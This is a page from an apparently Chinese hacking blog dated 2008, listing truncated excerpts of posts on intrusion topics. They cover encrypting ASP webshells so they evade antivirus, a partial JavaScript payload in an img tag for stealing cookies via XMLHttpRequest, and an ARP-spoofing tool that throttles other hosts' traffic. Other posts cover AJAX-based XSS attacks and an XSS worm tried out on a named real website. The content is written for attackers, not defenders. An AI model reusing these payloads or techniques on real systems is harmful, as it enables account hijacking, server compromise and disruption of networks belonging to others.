大家在入侵中应该是捡到过别人的Webshell吧?也许有的大马功能很好，于是你就用了，但是你没想过该马可能有后门?现在很多的大马都加密了，打开时候一片乱码，是不是也想加密自己的大马了，加密后的Webshell不仅可以防止别人捡我们的Shell用，还能免杀webshell。ASP木马加密不难，让我们一起踏上大马加密之旅。

　　一:人工加密

　　1.主加密函数的编写

　　1)主解密与解密函数

　　对大马的加密关键是编写我们的加密函数，然后写出相应的解密函数。我这里先得对几个ASP自带函数有个了解

阅读全文>>

类别：密码|算法 | 评论(0) | 浏览()

利用Ajax方式盗取Cookies

2008-06-07 19:10

作者: Knight

<img src="javascript:
//这里先要把XMLHttpRequestObject设置为false来验证声明httprequest时是否为true
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
alert("Javascript must be enabled to continue.");
}
function

阅读全文>>

类别：代码|源码 | 评论(0) | 浏览()

NtGodMode.exe干了什么

2008-06-07 19:06

by http://tmdnet.nothave.com

NtGodModex.exe http://www.xfocus.net/tools/200804/1272.html
NtGodMode.exe 9.00 KB (9,216 字节) UPX壳，直接用Ollydbg脱壳，过程略
NtGodMode~.exe 120 KB (123,392 字节) 用PE工具查看，delphi写的

00403220 > 55 PUSH EBP
00403221 8BEC MOV EBP,ESP
00403223 B9 0D000000 MOV ECX,0D
00403228 6A 00 PUSH 0
0040322A 6A 00 PUSH 0
0040322C 49 DEC ECX
0040322D ^ 75 F9 JNZ SHORT NtGodMod.00403228
0040322F 51 PUSH ECX
00

阅读全文>>

类别：黑客|渗透 | 评论(0) | 浏览()

skiller v3 beta2

2008-06-07 19:05

作者: cnqing
来源: cncert.net

软件说明：
可突破任意ARP防火墙，以限制流量为目标的简单网络管理软件。

使用方法：
1.在参数设置中选择好工作网卡；
2.检查网关信息和本机信息是否正确，如果不正确，请手动输入，无需保存；
3.点击流量探测或手动添加或自动扫描以填充目标列表；
4.设置一个代理，最好不同于目标，代理设置后，只有代理主机会收到伪流量；
5.选择要限制网速的主机；
6.开始控制。

v3beta2 更新说明：
1.修正流量探测容易被防火墙发现的BUG
2.

阅读全文>>

类别：资源|下载 | 评论(1) | 浏览()

关于AJAX注入

2008-06-07 19:01

作者：余弦
来源：0x37 Security

AJAX可以让数据在后台无声无息地进行，假如有办法让你的JS脚本与这个AJAX模块在同域内的话，那可以使用这个XSS来完成二次攻击，并且可以通过XHR对象的status属性来判断返回结果的正确与否。GET型的AJAX，直接构造URL里的参数值；POST型的AJAX，则构造好XHR对象的send方法里的参数值。

一般借用AJAX来完成的攻击，很难被用户察觉，除非我们要让用户察觉。firefox中的插件firebug能够分析出XHR的一切动作：

阅读全文>>

类别：安全|红客 | 评论(0) | 浏览()

Search Engine XSS Worm

2008-06-07 18:58

作者：余弦
来源：0x37 Security

有挑战才有意思，为了诞生个Search Engine XSS Worm，这里拿yeeyan做实验了。译言http://www.yeeyan.com/是一个“发现、翻译、阅读中文之外的互联网精华”的web2.0网站，过滤系统真BT，不过其搜索引擎存在跨站，它的搜索引擎也真够BT，转义单引号、双引号，并且当搜索值含英文冒号:时就不返回搜索结果。于是我只能这样构造：

阅读全文>>

类别：黑客|渗透 | 评论(0) | 浏览()

[首页] [上一页] [1] [2] 3 [4] [5] [6] [7] [8] [9] [10] [下一页] [尾页]

文章分类

默认分类(73)

黑客|渗透(151)

随笔|杂谈(31)

代码|源码(58)

后门|提权(48)

新闻|快讯(7)

密码|算法(6)

资源|下载(48)

漏洞|补丁(39)

安全|红客(10)

文章存档